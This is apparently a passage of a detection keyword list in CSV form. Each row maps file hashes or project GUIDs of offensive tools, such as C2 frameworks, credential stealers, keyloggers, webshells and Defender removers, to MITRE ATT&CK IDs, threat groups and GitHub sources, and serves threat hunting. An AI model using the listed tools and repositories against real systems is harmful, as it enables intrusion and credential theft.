"*9D1C563E5228B2572F5CA14F0EC33?CA0DEDA3D57*",".{0,1000}9D1C563E5228B2572F5CA14F0EC33\?CA0DEDA3D57.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","31916"
"*9D1D39D8-2387-46ED-A4A8-59D250C97F35*",".{0,1000}9D1D39D8\-2387\-46ED\-A4A8\-59D250C97F35.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","31917"
"*9d1f61358901da13ce8633966b867195a65b387169e5a019e6983f1d69290c4d*",".{0,1000}9d1f61358901da13ce8633966b867195a65b387169e5a019e6983f1d69290c4d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31918"
"*9d21a5677266c6ff348c79d69e7d2908e121bd5c4d841e9cb4eec90d81ceddd3*",".{0,1000}9d21a5677266c6ff348c79d69e7d2908e121bd5c4d841e9cb4eec90d81ceddd3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31920"
"*9d251c360046d1bb6a5a0d0e4de7c307b91044aa93a9ce6dc74820a01c5bb745*",".{0,1000}9d251c360046d1bb6a5a0d0e4de7c307b91044aa93a9ce6dc74820a01c5bb745.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31921"
"*9d28971b2a831336162f0d303cc1c7400e5876a968f2c6553b46c852ee121504*",".{0,1000}9d28971b2a831336162f0d303cc1c7400e5876a968f2c6553b46c852ee121504.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31922"
"*9d31cc4b07fb3b4be9ce62307c24acfcd5f13075723eb621a935d2a98d8e2f35*",".{0,1000}9d31cc4b07fb3b4be9ce62307c24acfcd5f13075723eb621a935d2a98d8e2f35.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31925"
"*9d3244ba1396ef5d4f5ee375dfa00971f5e6ed20aa2705c570497c78b9948ea8*",".{0,1000}9d3244ba1396ef5d4f5ee375dfa00971f5e6ed20aa2705c570497c78b9948ea8.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31926"
"*9D365106-D7B8-4B5E-82CC-6D6ABCDCA2B8*",".{0,1000}9D365106\-D7B8\-4B5E\-82CC\-6D6ABCDCA2B8.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","0","#GUIDproject","N/A","9","3","293","45","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z","31927"
"*9d3cce7420303a3eb892b991506ac45e00118f231a41a539b0425b41ec9188aa*",".{0,1000}9d3cce7420303a3eb892b991506ac45e00118f231a41a539b0425b41ec9188aa.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31929"
"*9d3ebfe38c45da2bedc4250b4a5b8dcfe4a6c3505ccfe9a429f39b06a8ecc228*",".{0,1000}9d3ebfe38c45da2bedc4250b4a5b8dcfe4a6c3505ccfe9a429f39b06a8ecc228.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","31931"
"*9d404660d091df7a8254e54ded6f39ed2b766b7ac4b08969b5b9db472c6a206e*",".{0,1000}9d404660d091df7a8254e54ded6f39ed2b766b7ac4b08969b5b9db472c6a206e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31932"
"*9d40e53bd79a33c9124c6d9e89e71c6ad329f180b2e73692daf82846ac1410a7*",".{0,1000}9d40e53bd79a33c9124c6d9e89e71c6ad329f180b2e73692daf82846ac1410a7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31933"
"*9d4774352f398cefc5f715559b274007b59768bd6d1684f7a71d3cc2529097c6*",".{0,1000}9d4774352f398cefc5f715559b274007b59768bd6d1684f7a71d3cc2529097c6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31934"
"*9d554dae02fa230c3c36b0014f0703b17afdf57a348083472f70688fb44eb912*",".{0,1000}9d554dae02fa230c3c36b0014f0703b17afdf57a348083472f70688fb44eb912.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31936"
"*9d571b529b8c97f1d95d00147a98ca6a208446100108993377ef74f7bfab0ced*",".{0,1000}9d571b529b8c97f1d95d00147a98ca6a208446100108993377ef74f7bfab0ced.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","31937"
"*9d584d6906a84285108c0500cab449e016a42bfd2b365f19ae851ff5312e2a33*",".{0,1000}9d584d6906a84285108c0500cab449e016a42bfd2b365f19ae851ff5312e2a33.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","31938"
"*9d6afdd06228c999288c7eb473b553b8808587182e6dda734f8fef44ebd1066c*",".{0,1000}9d6afdd06228c999288c7eb473b553b8808587182e6dda734f8fef44ebd1066c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31940"
"*9d778c3e1c0e383e85dba64c186e25d953b27fedf500f1e974f66f329bb98faf*",".{0,1000}9d778c3e1c0e383e85dba64c186e25d953b27fedf500f1e974f66f329bb98faf.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","31945"
"*9d780803519141fc8c14c067688184d7df094190cf74825b6ea6651e7ccd911b*",".{0,1000}9d780803519141fc8c14c067688184d7df094190cf74825b6ea6651e7ccd911b.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","31946"
"*9d7bfb3aeba4145896ece197216c4269deee6cce93eed3ffafe442ed05aeb4c4*",".{0,1000}9d7bfb3aeba4145896ece197216c4269deee6cce93eed3ffafe442ed05aeb4c4.{0,1000}","offensive_tool_keyword","SharpLogger","Keylogger written in C#","T1056.001 - T1056.003","TA0005 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/djhohnstein/SharpLogger","1","0","#filehash","N/A","10","2","126","41","2019-12-13T04:40:56Z","2018-12-18T01:45:17Z","31947"
"*9d847494b219b153345479919af7ca0e11e253c9f782fafeee8f74c63862c8a2*",".{0,1000}9d847494b219b153345479919af7ca0e11e253c9f782fafeee8f74c63862c8a2.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","31949"
"*9d8990ef035b5e7673e07a0093398642d0fb7f910349228e2c068dcce54127f0*",".{0,1000}9d8990ef035b5e7673e07a0093398642d0fb7f910349228e2c068dcce54127f0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31950"
"*9d91266126b654f10b15b28b1852307f73d749b64021db3ec62fea1002bfe621*",".{0,1000}9d91266126b654f10b15b28b1852307f73d749b64021db3ec62fea1002bfe621.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31951"
"*9da01c8f4125470c56a2d67eea6dff6a15d2b9b9ce084ad42171c85d36ebde6c*",".{0,1000}9da01c8f4125470c56a2d67eea6dff6a15d2b9b9ce084ad42171c85d36ebde6c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31952"
"*9da47a94bbb8d9322de8b7bb34958578776a47fdd440d2cca413fec7c78bc795*",".{0,1000}9da47a94bbb8d9322de8b7bb34958578776a47fdd440d2cca413fec7c78bc795.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","31953"
"*9da97c98754e746fdc15a562fec6b6c0374007d2bf3b89d53a15e82b409e724d*",".{0,1000}9da97c98754e746fdc15a562fec6b6c0374007d2bf3b89d53a15e82b409e724d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31954"
"*9dab89ef77aae50a68e256bf169057ea3083869c80a3caddccbddecc5b4f61f7*",".{0,1000}9dab89ef77aae50a68e256bf169057ea3083869c80a3caddccbddecc5b4f61f7.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#filehash","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","31955"
"*9db2d93288d2a07ec088c5b123cac2754a0a9ea5221e784eefedf96aca886a17*",".{0,1000}9db2d93288d2a07ec088c5b123cac2754a0a9ea5221e784eefedf96aca886a17.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#filehash","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","31956"
"*9db8218a9e3f41f406e9a3e0d23148069275d3a0ec0139e081d9d52ea40d3386*",".{0,1000}9db8218a9e3f41f406e9a3e0d23148069275d3a0ec0139e081d9d52ea40d3386.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","31957"
"*9dbb7cd0d0bc25a9ead8ef4a6b2635c503a4b1f60b62490abf0a068b1108ebff*",".{0,1000}9dbb7cd0d0bc25a9ead8ef4a6b2635c503a4b1f60b62490abf0a068b1108ebff.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","31958"
"*9dc2d1ac93b43a6f3450e6d99201dfa4b7e75e8872d97b6cc90e455201ff0c83*",".{0,1000}9dc2d1ac93b43a6f3450e6d99201dfa4b7e75e8872d97b6cc90e455201ff0c83.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","#filehash","N/A","10","","N/A","","","","31959"
"*9dc8078d3dbaf1fb1ca922f81df33cc871fef0a2dbe271a6756f9fcc0b6186b7*",".{0,1000}9dc8078d3dbaf1fb1ca922f81df33cc871fef0a2dbe271a6756f9fcc0b6186b7.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31961"
"*9dcfe69a9101e0c92a91f12ff03e7a3f1a19a6697c88920b7fcb76dd581a14fa*",".{0,1000}9dcfe69a9101e0c92a91f12ff03e7a3f1a19a6697c88920b7fcb76dd581a14fa.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","31962"
"*9ddb20f6175ae6a093b49528dee1db17ad5363de30ff316a04dbe44708597aaa*",".{0,1000}9ddb20f6175ae6a093b49528dee1db17ad5363de30ff316a04dbe44708597aaa.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","31964"
"*9de97ca3add57fbe16c2752b22478d49eacdd3d8f1c032bb43792a83ca92e5ca*",".{0,1000}9de97ca3add57fbe16c2752b22478d49eacdd3d8f1c032bb43792a83ca92e5ca.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","31965"
"*9dede3f64f01a53799636a50ff9f342ea1e2467771de9eccc3a1cd36e33db476*",".{0,1000}9dede3f64f01a53799636a50ff9f342ea1e2467771de9eccc3a1cd36e33db476.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","31967"
"*9df8ad1870faa8759951937913cbbc3d698b2bca0494ac1f2f578e76bc72ded5*",".{0,1000}9df8ad1870faa8759951937913cbbc3d698b2bca0494ac1f2f578e76bc72ded5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","31968"
"*9e0f93ef74347d1d494678f3eed8af14ac53fcf3e28349fc277f552e0fa6d984*",".{0,1000}9e0f93ef74347d1d494678f3eed8af14ac53fcf3e28349fc277f552e0fa6d984.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","31972"
"*9e1682246913526e808e837cdb9ffcd209ba4fe43be79c9505c2a98dfef3fb95*",".{0,1000}9e1682246913526e808e837cdb9ffcd209ba4fe43be79c9505c2a98dfef3fb95.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","31974"
"*9e1a4c27fa18f0126da8e2ea83f8c750e83d529c9fd6897327923c96ac6b3b89*",".{0,1000}9e1a4c27fa18f0126da8e2ea83f8c750e83d529c9fd6897327923c96ac6b3b89.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","31975"
"*9e1d32bf24ad4bd2def2368e1442237e0a1cc552b7b1fab4ca491b929141dd13*",".{0,1000}9e1d32bf24ad4bd2def2368e1442237e0a1cc552b7b1fab4ca491b929141dd13.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","31977"
"*9e2e7dd4185ca2abe91139c009790c2a8991e8c652ef8b0d80989a4070c764f0*",".{0,1000}9e2e7dd4185ca2abe91139c009790c2a8991e8c652ef8b0d80989a4070c764f0.{0,1000}","offensive_tool_keyword","sshamble","SSHamble is a research tool for analyzing SSH implementations focusing on attacks against authentication - timing analysis and post-session enumeration.","T1021 - T1040 - T1592 - T1033","TA0006 - TA0008 - TA0009","N/A","N/A","Credential Access","https://github.com/runZeroInc/sshamble","1","0","#filehash","N/A","10","10","946","74","2025-04-07T15:08:38Z","2024-07-27T20:32:10Z","31979"
"*9E357027-8AA6-4376-8146-F5AF610E14BB*",".{0,1000}9E357027\-8AA6\-4376\-8146\-F5AF610E14BB.{0,1000}","offensive_tool_keyword","SharpSword","Read the contents of MS Word Documents using Cobalt Strike's Execute-Assembly","T1562.004 - T1059.001 - T1021.003","TA0005 - TA0002","N/A","N/A","C2","https://github.com/OG-Sadpanda/SharpSword","1","0","#GUIDproject","N/A","8","10","117","11","2024-09-30T15:21:25Z","2021-07-15T14:50:05Z","31981"
"*9E36AE6E-B9FD-4B9B-99BA-42D3EACD7506*",".{0,1000}9E36AE6E\-B9FD\-4B9B\-99BA\-42D3EACD7506.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","31983"
"*9e373722530a78ab12472a38e0b6834a31162c25eeac4f02ce9cdb755e1effb0*",".{0,1000}9e373722530a78ab12472a38e0b6834a31162c25eeac4f02ce9cdb755e1effb0.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","31984"
